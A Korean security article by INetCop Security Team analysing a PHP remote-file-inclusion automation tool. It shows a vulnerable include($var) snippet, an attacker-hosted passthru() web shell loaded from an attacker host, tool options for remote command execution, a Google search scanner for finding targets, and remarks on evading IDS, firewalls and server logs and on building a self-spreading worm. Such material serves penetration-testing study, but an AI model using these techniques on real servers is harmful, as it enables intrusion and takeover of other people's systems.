<PRE>
<CENTER>
<FONT SIZE="4"><B>Analysis of 0x82030909 (PHP Injection Automation Tool)</B></FONT>

by INetCop Security Team

</CENTER><B>
- Content -

1. PHP Injection 자동화 도구의 개요.
2. PHP Injection 취약점 Proof of Concept
3. PHP Injection 자동화 도구 사용의 예제.
4. Plugin 응용 도구 사용의 예제.
5. 결론

</B>--


<B>1. PHP Injection 자동화 도구의 개요.</B>


PHP Injection에 대한 설명은 이미 다른 문서로 존재하므로 생략하겠다.
PHP Injection 모의 공격 시, 일반적으로 공격을 시도할 target 서버 한대와 명령어를 제공할 공격자의 서버 한대
(root권한 필요), 결론적으로 총 두대의 서버를 필요로 한다.

명령어를 제공하는 서버는 include 될 파일이 원격에서 명령어로 전달될 수 있도록 해야하므로 웹서비스를 실행해야
하며, 실행 중인 웹서버 디렉토리에 파일을 작성해야 한다. (대부분 웹서버 디렉토리에 파일을 작성하기 위해서는
root권한이 필요하다.)

2번 장에서 PHP Injection 취약점을 예제로 시험할 때 알게 되겠지만, 웹브라우져를 통해 target 서버를
공격하는 경우 "GET" method로 요청하기 때문에 브라우져 상에서 입력하여 요청하는 내용이 서버에 log로 저장된다.
이것은 공격자에게 있어서 치명적인 위험부담이 될 수 있다. 예를 들면, 정기적인 로그 검사 시, 웹상에서 공격했던
시스템 명령이 드러날 수 있다. (또한, 공격자 IP와 함께)

보통, 원격 침입 시 사용되는 PHP Injection 공격 기법은 웹 브라우져를 통해 요청하여 진행된다. 서버의 관리자
권한을 획득 후, 관련 로그를 삭제하기 때문인데, 만약 최종적인 관리자 권한 획득에 실패하였을 경우, 심각한
문제점이 발생할 수 있다.

결론적으로 우리는 보다 안전한 공격을 시도하면서, 신속하고 편리하게 작업할 수 있는 자동화 도구의 필요성을
느끼게 되었다.


<B>2. PHP Injection 취약점 Proof of Concept.</B>


이번 장에서는 일반적인 PHP injection 공격 방법을 시험해 볼 것이다.
모의 공격을 위해, 공격을 당할 서버에 PHP Injection에 취약한 다음 code를 업로드할 것이다.

// test.php
&lt;? include($var); ?&gt;

<IMG src="target.gif">
[공격 당할 서버 예제 사진]

$var 변수에 `test'라는 값을 입력하자, include path error가 출력되었다.
결론적으로 우리는 $var 변수에 공격 코드 URL을 입력하여 명령을 삽입할 수 있게 된다. 

그 후, 공격자의 웹서버에 다음 code를 업로드할 것이다.

// attack
&lt;? passthru($command); ?&gt;

<IMG src="attacker_host.gif">
[공격자의 서버 예제 사진]

$command 변수를 통해 시스템 명령어를 수행할 수 있도록 passthru() 함수를 사용하였다.

자, 그럼 모의 공격을 시도해보자.

다음과 같이 $var 변수에 `attacker_host' host에 있는 attack 파일을 include 요청하여 불러온 후,
$command 변수에 `id' 명령어를 삽입하여 현재 권한을 확인할 수 있었다.

<IMG src="test_attack.gif">
[공격 후, 명령어 결과 사진]

공격 후, 공격을 받은 시스템에 작성된 log 파일 일부를 읽어본 결과, 다음과 같은 내용을 볼 수 있었다.

<IMG src="log.gif">
[공격 후, 서버에 기록된 공격자의 IP 정보와 요청내용]

지금까지, 개념 증명하에 PHP Injection 취약점 모의 공격을 시도해보았다.
공격을 시도해본 결과, 여러대의 서버를 필요로 하고 또, 공격자의 요청내용이 서버에 기록된다는 사실을
알게 되었다.


<B>3. PHP Injection 자동화 도구 사용의 예제.</B>


자, 그럼 이번 장에서는 PHP Injection 자동화 도구를 이용하여 위의 test.php가 설치되어 있는 서버를
공격해보도록 하겠다. 사용법은 매우 간단하며, 도구를 사용 시, 반드시 입력해야 하는 정보는 다음과 같다.

1. PHP Injection 취약점이 존재하는 php URL.
2. 취약한 php 파일에서 사용하는 변수 이름.
3. 공격자 host의 주소.
4. 공격자 host의 port.

참고로, 공격자 host는 웹서버를 필요로 하지 않으며, exploit 자체내에서 웹서버를 만들어 사용하기 때문에
root 권한을 필요로 하지도 않는다.
이미 2번장에서 공격했던 대로 설정한다면.

1. http://target.inetcop.org/test.php
2. var
3. attacker_host.underattack.co.kr
4. 80

만약 공격자 host가 80번으로 웹서비스를 실행 중이라면, port 8000번이나, 8080번과 같이 사용하지 않는
port 번호를 지정해주면 된다. (기본 port: 8000번)

자, 공격을 시도해보자.

<IMG src="auto_tool1.gif">

-u 옵션은 취약점이 존재하는 PHP 파일의 URL을 입력할 때 사용된다.
(예: -u "http://target.inetcop.org/test.php")
-v 옵션은 취약한 변수이름을 입력할 때 사용된다. (예: -v "var")
-s 옵션은 공격자 host의 주소를 입력할 때 사용된다. (예: -s "attacker_host.underattack.co.kr")
-p 옵션은 공격자의 port 번호를 입력할 때 사용된다. (예: -p 8080)
-c 옵션은 원격에서 실행할 명령을 입력할 때 사용된다. (예: -c "uname -a; pwd; id")

최종적으로 다음과 같이 입력하여 권한을 획득할 수 있었다.

<IMG src="auto_tool2.gif">
[공격 후, 원격에서 shell을 획득한 모습]


<B>4. Plugin 응용 도구 사용의 예제.</B>


자동화 도구를 위해 지원하는 Plugin 도구를 소개하도록 하겠다.

첫번째 소개할 Plugin 도구는 google web을 이용한 자동 스캐너이다. 사용법은 매우 간단하며, google web을
통해 순차적으로 검사하여 나온 결과물을 화면에 출력시킨다.

<IMG src="plugin_scan.gif">
[자동 스캐너 사용 방법]

-h 옵션은 위의 화면과 같이 사용법을 출력해주며, -s 옵션을 통해 서비스 중인 google 서버를 선택할 수 있다.
-t 옵션을 이용하여 검색할 문자열을 입력할 수 있다.
다음 화면은 "test.php"를 검색했을 때 불러오는 결과이다.

<IMG src="plugin_scan2.gif">
[스캔을 통해 검색 결과를 출력하는 모습]

두번째 소개할 Plugin 도구는 게시판이나 웹 어플리케이션 프로그램 취약점 정보를 모듈화하여 편하고 쉽게
모의 해킹을 시도할 수 있도록 개발된 도구이다. 이 도구를 이용하면, 취약한 프로그램의 정보를 컴파일하여,
바이너리로 작성하는데, 이렇게 작성된 바이너리의 정보를 통해 취약점을 exploit 할 수 있다.

다음 화면은 `0day'라는 취약 프로그램 정보 설정 파일이다.

<IMG src="plugin_module.gif">
[바이너리로 컴파일 되기 전, 취약한 프로그램의 정보를 담은 설정 파일]

다음 화면은 자동화 공격 모듈 도구의 사용 방법이다.

<IMG src="plugin_module2.gif">
[도구의 사용 방법]

위에 컴파일하기 전의 설정 파일을 컴파일하기 위해서는 -w 옵션을 사용해야 한다.

<IMG src="plugin_module3.gif">
[컴파일하는 모습]

`0day.bin' 파일은 원래 존재하지 않았지만, `0day'라는 설정 파일을 컴파일하여 바이너리 파일을 생성할 수
있었다. 자, 컴파일 한 후, 자동화 공격 모듈 도구를 다시 실행해보았다.

<IMG src="plugin_module4.gif">
[설정 파일 컴파일 후, 사용 방법]

컴파일 후, 도구의 사용 방법이 추가되었다. 화면의 아래 쪽에 설정 파일에 있었던 각종 웹 어플리케이션
프로그램들이 공격 target으로 생성되었다. 자, 여러 target 중 하나만을 선택하여, 공격을 시험해보도록 하겠다.

<IMG src="plugin_module5.gif">
[모듈을 통해 자동화 공격을 시도하는 모습]

컴파일된 바이너리 모듈을 통해 매우 쉽게 공격에 성공할 수 있었다.


<B>5. 결론</B>


지금까지 자동화 된 PHP Injection 공격을 통해, 매우 쉽게 모의 해킹을 시도할 수 있었다.
이와 같은 공격은 대부분 IDS에서 감지하지 못하며, 웹을 통한 공격이기 때문에 방화벽을 우회할 수 있고,
서버 로깅을 최소화 할 수 있다.

최근 공개된 kernel exploit을 Plugin module로 개발한 결과, 자동으로 관리자 권한을 획득하는 test worm
생성도 가능하였다. (auto google scan -> auto remote attack -> auto local exploit)
이러한 자동화 module의 강점은 빠른 시간내에 patch 수행이 가능하다는 것이다.
예를 들면, kernel exploit이 아닌, 취약점 patch module을 Plugin으로 개발할 경우, 수많은 서버의 취약점을
빠른 시간내에 제거할 수 있다. (이것은 본래, `INetCop Security'의 개발 목적이다.)

만일 `script kiddie'가 우리의 도구를 악용하게 된다면, 이는 가히 치명적인 결과를 불러 일으킬 것이다.
우리 `INetCop Security'에서는 시험 도구와 함께 보안 결함을 해결할 수 있는 다양한 솔루션을 연구하고
있다. 이러한 작업을 통해, 국내외 웹 해킹 공격의 유형을 빠르게 분석하여 해결하고 있으며, 해킹 공격 피해를
막기 위해, 최선을 다해 노력 중이다.

--
감사합니다.